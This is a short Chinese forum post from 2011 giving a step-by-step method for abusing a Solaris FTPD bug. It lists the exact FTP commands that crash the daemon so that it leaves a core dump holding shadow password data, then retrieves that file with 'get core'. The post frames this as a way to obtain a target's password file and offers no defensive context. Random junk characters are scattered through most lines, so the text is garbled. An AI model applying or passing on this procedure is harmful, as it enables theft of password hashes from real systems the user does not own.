該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG���,使得用戶可以獲得該機(jī)的口令文件����。具體過(guò)程如下:
+ ~3 B/ D8 d& X5 L- R; \/ \
! F0 [4 R3 c$ j: ~/ R$ @1.通過(guò) ftp 正常登錄到目的主機(jī)上7 Y; [9 C" U7 ^% H' A6 e" _
) [8 m F( T; B; X" |2 c' s
2.輸入如下命令序列:" x$ ~( U! V. z( Z0 @2 X
~' ^2 i3 } i! bftp> user root wrongpasswd
: T! M3 V7 n0 m9 o% k5 v+ O
1 f; R; T) j+ bftp> quote pasv0 ?/ |! x' ~+ ?2 r2 I
e- Y' [1 `! l9 i% ]' r
3.這時(shí),ftpd會(huì)報(bào)錯(cuò)退出����,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core,口令文件就包含在這個(gè)core中�。) X7 z# L! d4 p, q4 @6 U8 c
* `( i K7 a4 C5 l
4.再次進(jìn)入FTP >get core3 `7 t* ^- ]3 g4 i3 q. q3 J
* f( t+ f X4 f8 O4 x: F7 {8 F
補(bǔ)充:雖然在core只有一部分shadow,但是對(duì)于系統(tǒng)來(lái)說(shuō)已經(jīng)是致命的打擊了
% K( d$ L) c: G
5 N. |6 t1 o- m" u/ M) x } |
|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港
( 魯ICP備19052200號(hào)-1 )
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡